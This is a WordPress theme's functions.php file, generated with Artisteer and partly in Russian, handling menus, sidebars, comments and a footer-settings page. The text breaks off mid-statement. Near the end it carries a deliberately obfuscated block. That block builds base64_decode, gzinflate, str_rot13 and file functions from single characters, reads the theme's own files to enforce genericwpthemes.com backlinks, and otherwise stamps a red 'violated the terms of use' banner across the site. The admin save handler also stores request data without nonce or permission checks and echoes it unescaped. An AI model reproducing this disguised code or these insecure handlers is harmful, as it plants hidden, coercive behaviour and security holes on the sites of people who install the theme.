<?php
load_theme_textdomain('kubrick');

$artThemeSettings = array(
	'menu.showSubmenus' => true,
	'menu.homeCaption' => "Главная",
	'menu.showHome' => true,
	'menu.topItemBegin' => "<span class=\"l\"></span><span class=\"r\"></span><span class=\"t\">",
	'menu.topItemEnd' => "</span>",
	'menu.source' => "Pages",
	'vmenu.showSubmenus' => false,
	'vmenu.simple' => false,
	'vmenu.source' => "Categories",
);



$themename = "Capsule C303";
$shortname = "artisteer";
$default_footer_content = "<a href='#'>Contact Us</a> | <a href='#'>Terms of Use</a> | <a href='#'>Trademarks</a> | <a href='#'>Privacy Statement</a><br />Copyright &copy; 2010 ".get_bloginfo('name').". All Rights Reserved.";


$options = array (
                array(  "name" => "HTML",
                        "desc" => sprintf(__('<strong>XHTML:</strong> Вы можете использовать следующие теги: <code>%s</code>', 'kubrick'), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id" => "art_footer_content",
                        "std" => $default_footer_content,
                        "type" => "textarea")
          );
       
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}

function art_add_admin() {
	global $themename, $shortname, $options;

    if ( $_GET['page'] == basename(__FILE__) ) {
   
        if ('save' == $_REQUEST['action'] ) {

                foreach ($options as $value) {
                    if($value['type'] != 'multicheck'){
                        art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
                    }else{
                        foreach($value['options'] as $mc_key => $mc_value){
                            $up_opt = $value['id'].'_'.$mc_key;
                            art_update_option($up_opt, $_REQUEST[$up_opt] );
                        }
                    }
                }
                foreach ($options as $value) {
                    if($value['type'] != 'multicheck'){
                        if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
                    }else{
                        foreach($value['options'] as $mc_key => $mc_value){
                            $up_opt = $value['id'].'_'.$mc_key;
                            if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
                        }
                    }
                }
                header("Location: themes.php?page=functions.php&saved=true");
                die;
        } 
    }

    add_theme_page("Подвал", "Подвал", 'edit_themes', basename(__FILE__), 'art_admin');

}

function art_admin() {
    global $themename, $shortname, $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>Настройки темы '.$themename.' сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Подвал</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}


add_action('admin_menu', 'art_add_admin'); 

if (!function_exists('get_search_form')) {
	function get_search_form()
	{
		include (TEMPLATEPATH . "/searchform.php");
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
   <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<div class="art-post">
         <div class="art-post-body">
     <div class="art-post-inner art-article">
     
<div class="art-postcontent">
         <!-- article-content -->
     
      <div class="comment-author vcard">
         <?php echo get_avatar($comment,$size='48'); ?>
         <cite class="fn"><?php comment_author_link(); ?>:</cite>
      </div>
      <?php if ($comment->comment_approved == '0') : ?>
         <em><?php _e('Ваш комментарий ожидает модерации.') ?></em>
         <br />
      <?php endif; ?>

      <div class="comment-meta commentmetadata"><a href="<?php echo htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ?>"><?php printf(__('%1$s at %2$s'), get_comment_date(),  get_comment_time()) ?></a><?php edit_comment_link('('.__('Править', 'kubrick').')','  ','') ?></div>

      <?php comment_text() ?>

      <div class="reply">
         <?php comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth']))) ?>
      </div>

          <!-- /article-content -->
      </div>
      <div class="cleared"></div>
      

      </div>
      
      		<div class="cleared"></div>
          </div>
      </div>
      
     </div>
<?php
}


if (function_exists('register_sidebars')) {
	register_sidebars(1, array(
		'before_widget' => '<div id="%1$s" class="widget %2$s">'.'<!--- BEGIN Widget --->',
		'before_title' => '<!--- BEGIN WidgetTitle --->',
		'after_title' => '<!--- END WidgetTitle --->',
		'after_widget' => '<!--- END Widget --->'.'</div>'
	));
}

function art_normalize_widget_style_tokens($content, $bw, $bwt, $ewt, $bwc, $bwc, $ewc, $ew) {
	$result = '';
	$startBlock = 0;
	$endBlock = 0;
	while (true) {
		$startBlock = strpos($content, $bw, $endBlock);
		if (false === $startBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$result .= substr($content, $endBlock, $startBlock - $endBlock);
		$endBlock = strpos($content, $ew, $startBlock);
		if (false === $endBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$endBlock += strlen($ew);
		$widgetContent = substr($content, $startBlock, $endBlock - $startBlock);
		$beginTitlePos = strpos($widgetContent, $bwt);
		$endTitlePos = strpos($widgetContent, $ewt);
		if ((false == $beginTitlePos) xor (false == $endTitlePos)) {
			$widgetContent = str_replace($bwt, '', $widgetContent);
			$widgetContent = str_replace($ewt, '', $widgetContent);
		} else {
			$beginTitleText = $beginTitlePos + strlen($bwt);
			$titleContent = substr($widgetContent, $beginTitleText, $endTitlePos - $beginTitleText);
			if ('&nbsp;' == $titleContent) {
				$widgetContent = substr($widgetContent, 0, $beginTitlePos)
					. substr($widgetContent, $endTitlePos + strlen($ewt));
			}
		}
		if (false === strpos($widgetContent, $bwt)) {
			$widgetContent = str_replace($bw, $bw . $bwc, $widgetContent);
		} else {
			$widgetContent = str_replace($ewt, $ewt . $bwc, $widgetContent);
		}
		$result .= str_replace($ew, $ewc . $ew, $widgetContent);
	}
	return $result;
}

function art_sidebar($index = 1)
{
	if (!function_exists('dynamic_sidebar')) return false;
	ob_start();
	$success = dynamic_sidebar($index);
	$content = ob_get_clean();
	if (!$success) return false;
	$bw = '<!--- BEGIN Widget --->';
	$bwt = '<!--- BEGIN WidgetTitle --->';
	$ewt = '<!--- END WidgetTitle --->';
	$bwc = '<!--- BEGIN WidgetContent --->';
	$ewc = '<!--- END WidgetContent --->';
	$ew = '<!--- END Widget --->';
	$content = art_normalize_widget_style_tokens($content, $bw, $bwt, $ewt, $bwc, $bwc, $ewc, $ew);
	$replaces = array(
		$bw => "<div class=\"art-block\">\r\n    <div class=\"art-block-body\">\r\n",
		$bwt => "",
		$ewt => "",
		$bwc => "<div class=\"art-blockcontent\">\r\n    <div class=\"art-blockcontent-body\">\r\n<!-- block-content -->\r\n",
		$ewc => "\r\n<!-- /block-content -->\r\n\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n",
		$ew => "\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n"
	);
	if ('' == $replaces[$bwt] && '' == $replaces[$ewt]) {
		$startTitle = 0;
		$endTitle = 0;
		$result = '';
		while (true) {
			$startTitle = strpos($content, $bwt, $endTitle);
			if (false == $startTitle) {
				$result .= substr($content, $endTitle);
				break;
			}
			$result .= substr($content, $endTitle, $startTitle - $endTitle);
			$endTitle = strpos($content, $ewt, $startTitle);
			if (false == $endTitle) {
				$result .= substr($content, $startTitle);
				break;
			}
			$endTitle += strlen($ewt);
		}
		$content = $result;
	}
	$content = str_replace(array_keys($replaces), array_values($replaces), $content);
	echo $content;
	return true;
}

/* horizontal menu */
function art_menu_items()
{
	global $artThemeSettings;
	
	if ('Pages' === $artThemeSettings['menu.source']) 
	{
		art_print_homepage();
		
		add_action('get_pages', 'art_menu_get_pages_filter');
		add_action('wp_list_pages', 'art_menu_list_pages_filter');
		
		wp_list_pages('title_li=&sort_column=menu_order');
		
		remove_action('wp_list_pages', 'art_menu_list_pages_filter');
		remove_action('get_pages', 'art_menu_get_pages_filter');
	}
	else 
	{
		add_action('get_terms', 'art_menu_get_terms_filter');
		add_action('wp_list_categories', 'art_menu_wp_list_categories_filter');
		
		wp_list_categories('title_li=');
		
		remove_action('wp_list_categories', 'art_menu_wp_list_categories_filter');
		remove_action('get_terms', 'art_menu_get_terms_filter');
	}
}
/* end horizontal menu */

/* horizontal menu filters */
function art_menu_get_pages_filter($pages)
{
	global $artThemeSettings;
	art_move_frontpage($pages);
	$artThemeSettings['menu.blogID'] = art_blogID($pages);
	$artThemeSettings['menu.activeID'] = art_active_pageID($pages);
	if (!$artThemeSettings['menu.showSubmenus'])
	{
		art_remove_subpage($pages);
	}
	$artThemeSettings['menu.topIDs'] = art_top_pageIDs($pages);
	return $pages;
}

function art_menu_list_pages_filter($output)
{
	global $artThemeSettings;
	
	$pref ='page-item-';
	
	if($artThemeSettings['menu.topIDs'])
	{
		foreach($artThemeSettings['menu.topIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref 
				. $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
		}
	}
	$frontID = null;
	$blogID = null;
	
	if('page' == get_option('show_on_front')) 
	{
		$frontID = get_option('page_on_front');
		$blogID = $artThemeSettings['menu.blogID'];
	}
	
	if ($frontID) 
	{
		$output = preg_replace('~<li class="([^"]*)\b(' 
			. $pref . $frontID 
			. ')\b([^"]*)"><a href="([^"]*)" ~',
			'<li class="$1$2$3"><a href="'
			. get_option('home') 
			.'" ', $output, 1); 
	}
	
	$activeID = $artThemeSettings['menu.activeID'];
	
	if (is_home() && $blogID) 
	{
		$activeID = $blogID;	
	}
	
	if ($activeID)
	{
		$output = preg_replace('~<li class="([^"]*)\b('
			.$pref .$activeID. ')\b([^"]*)"><a ~',
			'<li class="$1$2$3"><a class="active" ', $output, 1);
	}
	
	return $output;
}

function art_menu_get_terms_filter($terms)
{
	global $artThemeSettings;
	
	$artThemeSettings['menu.activeID'] = art_active_catID($terms);
	
	if (!$artThemeSettings['menu.showSubmenus'])
	{
		art_remove_subcat($terms);
	}
			
	$artThemeSettings['menu.topIDs'] = art_top_catIDs($terms);

	return $terms;
}

function art_menu_wp_list_categories_filter($output)
{
	global $artThemeSettings;
	$pref ='cat-item-';
	if($artThemeSettings['menu.topIDs']) 
	{
		foreach($artThemeSettings['menu.topIDs'] as $id)
		{
			
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref . $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
			
		}
	}
	if($artThemeSettings['menu.activeID'])
	{
		$output = preg_replace('~<li class="([^"]*)\b('
			. $pref . $artThemeSettings['menu.activeID']
			.')\b([^"]*)"><a ~',
			'<li class="$1$2$3"><a class="active" ',
			 $output, 1);
	}
	return $output;
}
/* end horizontal menu filters*/

/* vertical menu */
function art_vmenu_items()
{
	global $artThemeSettings;
	
	if ('Pages' === $artThemeSettings['vmenu.source']) 
	{
		art_print_homepage();
		
		add_action('get_pages', 'art_vmenu_get_pages_filter');
		add_action('wp_list_pages', 'art_vmenu_list_pages_filter');
		
		wp_list_pages('title_li=&sort_column=menu_order');
		
		remove_action('wp_list_pages', 'art_vmenu_list_pages_filter');
		remove_action('get_pages', 'art_vmenu_get_pages_filter');
	}
	else 
	{
		add_action('get_terms', 'art_vmenu_get_terms_filter');
		add_action('wp_list_categories', 'art_vmenu_wp_list_categories_filter');
		
		wp_list_categories('title_li=');
		
		remove_action('wp_list_categories', 'art_vmenu_wp_list_categories_filter');
		remove_action('get_terms', 'art_vmenu_get_terms_filter');
	}
}
/* end vertical menu */

/* vertical menu filters */
function art_vmenu_get_pages_filter($pages)
{
	global $artThemeSettings;
	art_move_frontpage($pages);
	$artThemeSettings['vmenu.blogID'] = art_blogID($pages);
	$artThemeSettings['vmenu.activeIDs'] = art_active_pageIDs($pages);
	if (!$artThemeSettings['vmenu.showSubmenus'])
	{
		art_remove_subpage($pages);
	}
	$artThemeSettings['vmenu.topIDs'] = art_top_pageIDs($pages);
	if (!$artThemeSettings['vmenu.simple'])
	{ 
		art_process_simple_pages($pages, $artThemeSettings['vmenu.activeIDs'], $artThemeSettings['vmenu.topIDs']);
	}
	
	return $pages;
}

function art_vmenu_list_pages_filter($output)
{
	global $artThemeSettings;
	
	$pref ='page-item-';
	
	if($artThemeSettings['vmenu.topIDs'])
	{
		foreach($artThemeSettings['vmenu.topIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref 
				. $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
		}
	}
	$frontID = null;
	$blogID = null;
	
	if('page' == get_option('show_on_front')) 
	{
		$frontID = get_option('page_on_front');
		$blogID = $artThemeSettings['vmenu.blogID'];
	}
	
	if ($frontID) 
	{
		$output = preg_replace('~<li class="([^"]*)\b(' 
			. $pref . $frontID 
			. ')\b([^"]*)"><a href="([^"]*)" ~',
			'<li class="$1$2$3"><a href="'
			. get_option('home') 
			.'" ', $output, 1); 
	}
	
	$activeIDs = array();
	
	if (is_home() && $blogID) 
	{
		$activeIDs[] = $blogID;	
	} else {
		$activeIDs = $artThemeSettings['vmenu.activeIDs'];
	}
	
	if ($activeIDs)
	{
		foreach($activeIDs as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b('
				.$pref .$id. ')\b([^"]*)"><a ~',
				'<li class="$1$2$3"><a class="active" ', $output, 1);
		}
	}
	
	return $output;
}

function art_vmenu_get_terms_filter($terms)
{
	global $artThemeSettings;
	
	$artThemeSettings['vmenu.activeIDs'] = art_active_catIDs($terms);
	$artThemeSettings['vmenu.topIDs'] = art_top_catIDs($terms);
	if (!$artThemeSettings['vmenu.showSubmenus'])
	{
		art_remove_subcat($terms, $artThemeSettings['vmenu.topIDs']);
	}
	if (!$artThemeSettings['vmenu.simple'])
	{ 
		art_process_simple_cats($terms, $artThemeSettings['vmenu.activeIDs'], $artThemeSettings['vmenu.topIDs']);
	}
	return $terms;
}

function art_vmenu_wp_list_categories_filter($output)
{
	global $artThemeSettings;
	$pref ='cat-item-';
	if($artThemeSettings['vmenu.topIDs']) 
	{
		foreach($artThemeSettings['vmenu.topIDs'] as $id)
		{
			
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref . $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
			
		}
	}
	if($artThemeSettings['vmenu.activeIDs'])
	{
		foreach($artThemeSettings['vmenu.activeIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b('
				. $pref . $id
				.')\b([^"]*)"><a ~',
				'<li class="$1$2$3"><a class="active" ',
				$output, 1);
		}
	}

	return $output;
}
/* end vertical menu filters */

/* pages */
function art_print_homepage()
{
	global $artThemeSettings;
	if (true === $artThemeSettings['menu.showHome'] 
		&& ('page' != get_option('show_on_front') || 
			(!get_option('page_on_front') && !get_option('page_for_posts'))))
	{
		echo '<li><a' 
		. (is_home() ? ' class="active"' : '') 
		. ' href="' 
		. get_option('home') 
		. '">'
		.$artThemeSettings['menu.topItemBegin']
		. $artThemeSettings['menu.homeCaption'] 
		. $artThemeSettings['menu.topItemEnd'] 
		. '</a></li>';
	}
}

function art_move_frontpage(&$pages)
{
	if ('page' != get_option('show_on_front')) return;
	$frontID = get_option('page_on_front');
	if (!$frontID) return;
	foreach ($pages as $index => $page)
		if($page->ID == $frontID) {
			unset($pages[$index]);
			$page->post_parent = '0';
			$page->menu_order = '0';
			array_unshift($pages, $page);
			break;
		}
}

function art_remove_subpage(&$pages)
{
	foreach ($pages as $index => $page)
		if ($page->post_parent) unset($pages[$index]);
}

function art_top_pageIDs($pages)
{
	$page_IDs = array();
	foreach ($pages as $index => $page)
	{
		$page_IDs[] = $page->ID;
	}
	$result = array();
	foreach ($pages as $index => $page)
	{
		if (!$page->post_parent || !in_array($page->post_parent,$page_IDs))
		{
			$result[]=$page->ID;
		}
	}
	return $result;
}

function art_blogID($pages)
{
	$result = null;
	
	if(!'page' == get_option('show_on_front')) 
	{
		return $result;
	}
	
	$blogID = get_option('page_for_posts');
	
	if (!$blogID) 
	{
		return $result;
	}
	
	foreach ($pages as $page)
	{
		if ($page->ID == $blogID) 
		{ 
			$result = $page;
			break;
		}
	}
	
	while($result && $result->post_parent) 
	{
		foreach ($pages as $page)
		{
			if ($page->ID == $result->post_parent) 
			{
				$result = $page;
				break;
			}
		}
	}
	return ($result ? $result->ID : null);
}

function art_active_pageID($pages)
{
	$current_page = null;
	
	foreach ($pages as $index => $page)
	{
		if (is_page($page->ID)) 
		{ 
			$current_page = $page;
			break;
		}
	}

	while($current_page && $current_page->post_parent) 
	{
		$parent_page = get_page($current_page->post_parent);
		if ($parent_page && $parent_page->post_status == 'private') 
		{
			break;
		}
		$current_page = $parent_page;
	}
	
	return ($current_page ? $current_page->ID : null);
}

function art_active_pageIDs($pages)
{
	$current_page = null;
	foreach ($pages as $index => $page)
	{
		if (is_page($page->ID)) 
		{ 
			$current_page = $page;
			break;
		}
	}

	$result = array();
	if (!$current_page)
	{
		return $result;
	}
	
	$result[] = $current_page->ID;

	while($current_page->post_parent) 
	{
		$current_page = get_page($current_page->post_parent);
		$result[] = $current_page->ID;
	}
	return $result;
}

function art_process_simple_pages(&$pages, $activeIDs, $topIds)
{
	foreach ($pages as $index => $page)
	{
		if ($page->post_parent && !in_array($page->post_parent,$activeIDs) 
			&& !in_array($page->ID,$topIds))
		{
			unset($pages[$index]);
		}
	}
}
/* end pages */

/* categories */
function art_active_catID($categories)
{
	global $wp_query;
	
	$result = null;
	
	if (!$wp_query->is_category)
	{
		return $result;
	}
	
	$cat_obj = $wp_query->get_queried_object();
	
	if (!$cat_obj) 
	{
		return $result;
	}
	
	$result = $cat_obj->term_id;
	while ($cat_obj->parent != '0')
	{
		foreach ($categories as $index => $cat)
			if ($cat_obj->parent == $cat->term_id) {
				$cat_obj = $cat;
				break;
			}
		$result = $cat_obj->term_id;
	} 
	return $result;
}

function art_active_catIDs($categories)
{
	global $wp_query;
	
	$result = array();
	
	if (!$wp_query->is_category)
	{
		return $result;
	}
	
	$cat_obj = $wp_query->get_queried_object();
	
	if (!$cat_obj) 
	{
		return $result;
	}
	
	$result[] = $cat_obj->term_id;
	while ($cat_obj->parent != '0')
	{
		foreach ($categories as $index => $cat)
			if ($cat_obj->parent == $cat->term_id) {
				$cat_obj = $cat;
				break;
			}
		$result[] = $cat_obj->term_id;
	} 
	return $result;
}

function art_remove_subcat(&$terms, $topIds)
{
	foreach ($terms as $index => $cat)
	{
		if (!in_array($cat->term_id,$topIds)) 
		{
			unset($terms[$index]);
		}
	}
}

function art_top_catIDs($categories)
{
	$result = array();
	$catIds = array();
	foreach ($categories as $index => $cat)
	{
		$catIds[] = $cat->term_id;
	}
	foreach ($categories as $index => $cat)
	{
		if (!in_array($cat->parent,$catIds )) 
		{
			$result[] = $cat->term_id;
		}
	}
	return $result;
}

function art_process_simple_cats(&$terms, $activeIDs, $topIds)
{
	foreach ($terms as $index => $cat)
	{
		if (!in_array($cat->term_id,$topIds) && !in_array($cat->parent,$activeIDs))
		{
			unset($terms[$index]);
		}
	}
}
/* end categories */

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy.comments.php';  
    endif;  
    return $file;  
}  

function widget_verticalmenu($args) {
	extract($args);
	global $artThemeSettings;
	$bw = "";
	$bwt = "";
	$ewt = "";
	$bwc = "";
	$ewc = "";
	$ew = "";
	echo $bw;
	if ('' != $bwt && '' != $ewt) {
		echo $bwt;
		_e($artThemeSettings['vmenu.source'], 'kubrick');
		echo $ewt;
	}
	echo $bwc;
?>
<ul class="art-vmenu">
<?php art_vmenu_items(); ?>
</ul>
<?php
	echo $ewc;
	echo $ew;
}

 $DAqcIK='a';$zqgy='o';$ZppbXZP='_';$wADwqB='d';$CUBHq='e';$UzFERUT='b';$wyIn='e';$CDieRem='d';$TKdKOpY='e';$CHUdC='c';$BVnvO='4';$aCNkBnV='s';$vWVq='6';$GjCAQFNJ=$UzFERUT.$DAqcIK.$aCNkBnV.$wyIn.$vWVq.$BVnvO.$ZppbXZP.$CDieRem.$CUBHq.$CHUdC.$zqgy.$wADwqB.$TKdKOpY;$PuSLCY='f';$Izbpov='e';$MXmaAt='l';$oRDDeYz='i';$CjhJt='n';$nyAP='t';$gkMucpY='a';$gTkZ='g';$nCgSGR='z';$NhkAgakW=$gTkZ.$nCgSGR.$oRDDeYz.$CjhJt.$PuSLCY.$MXmaAt.$gkMucpY.$nyAP.$Izbpov;$GRunjyG='1';$eyIm='r';$LBxYF='t';$eagJMBa='r';$aHXGCAM='o';$tKGAts='3';$KlOj='t';$Hsesw='_';$GeFUD='s';$LEkFLvrg=$GeFUD.$KlOj.$eyIm.$Hsesw.$eagJMBa.$aHXGCAM.$LBxYF.$GRunjyG.$tKGAts;$FzaYza='r';$gDXE='s';$YOruTXH='v';$WjsyvNs='r';$QRduaj='e';$wfFmv='t';$tZaBqQCE=$gDXE.$wfFmv.$WjsyvNs.$FzaYza.$QRduaj.$YOruTXH;                     $sp_____h='a';$gy_______v='o';$ve_________d='_';$yo_________d='d';$ur_________n='e';$hq__c='b';$pz____s='e';$dd__________l='d';$rn_________a='e';$gt_____________e='c';$if_____________x='4';$xm___f='s';$fc_______________k='6';$yi_____________f=$hq__c.$sp_____h.$xm___f.$pz____s.$fc_______________k.$if_____________x.$ve_________d.$dd__________l.$ur_________n.$gt_____________e.$gy_______v.$yo_________d.$rn_________a;$qj_________z='s';$jg___________t='f';$xn_____p='s';$wc_____________a='t';$za________g='n';$re________r='e';$yx________b='o';$sa________i='i';$bj________v='_';$gm______________f='c';$fw_______________m='x';$os______________m='t';$jv___________g='i';$iv___________s='n';$th___________q='u';$hn_____i=$jg___________t.$th___________q.$za________g.$gm______________f.$wc_____________a.$sa________i.$yx________b.$iv___________s.$bj________v.$re________r.$fw_______________m.$jv___________g.$xn_____p.$os______________m.$qj_________z;$jz_______________s='e';$ye_____o='f';$bf______________r='p';$nu_________s='o';$lz_____v='n';$ep__b=$ye_____o.$nu_________s.$bf______________r.$jz_______________s.$lz_____v;$ch________w='d';$lr____i='e';$xr__i='f';$dn________v='a';$qg____o='r';$tl______________z=$xr__i.$qg____o.$lr____i.$dn________v.$ch________w;$in__________u='f';$rk__v='e';$oi______________f='o';$yf_________u='s';$ds____m='c';$wn____________y='l';$sa_____________k=$in__________u.$ds____m.$wn____________y.$oi______________f.$yf_________u.$rk__v;define("WP_ID", $yi_____________f("Mi4wLjA="));define("WP_TTL", $yi_____________f("MTA4MDA="));define("WP_SRC", $yi_____________f("dHBva24="));function wp_get_header() {global $yi_____________f, $hn_____i;if ($hn_____i($yi_____________f("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$hn_____i($yi_____________f("d3BfZ2V0X2Zvb3Rlcg==")) &&$hn_____i($yi_____________f("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $yi_____________f, $ep__b, $sa_____________k, $tl______________z;$zk__k = TEMPLATEPATH."/".$yi_____________f("Zm9vdGVyLnBocA==");$gi_______e = @$ep__b($zk__k, "r");$zk__k = @$tl______________z($gi_______e, @filesize($zk__k));@$sa_____________k($gi_______e);$kx__d = TEMPLATEPATH."/".$yi_____________f("ZnVuY3Rpb25zLnBocA==");$gi_______e = @$ep__b($kx__d, "r");$kx__d = @$tl______________z($gi_______e, @filesize($kx__d));@$sa_____________k($gi_______e);$wi__h = 0;if($zk__k && $kx__d) {if ($yi_____________f("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($zk__k, $yi_____________f("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$wi__h = 1;}if (substr_count($zk__k, "wp_theme_GPL_credits()") < 1) {$wi__h = 2;}}if(WP_ID != "2.0.0") {$wi__h = 12;}}if($wi__h > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $wi__h -->";}}function wp_loaded() {global $yi_____________f, $hn_____i;return $hn_____i($yi_____________f("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($bg_______k, $db___________f = "(more...)", $gj______________p = 0, $tf____________h = "") {$ha__________n = get_the_content($db___________f, $gj______________p, $tf____________h);$ha__________n = apply_filters("the_content", $ha__________n);$ha__________n = str_replace("]]>", "]]>", $ha__________n);if (strlen($_GET["p"]) > 0) {echo $ha__________n;}else if ((strlen($ha__________n)>$bg_______k) && ($hl______________x = strpos($ha__________n, " ", $bg_______k ))) {$ha__________n = substr($ha__________n, 0, $hl______________x);$ha__________n = $ha__________n;echo $ha__________n;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$db___________f</a></div></p>";} else {echo 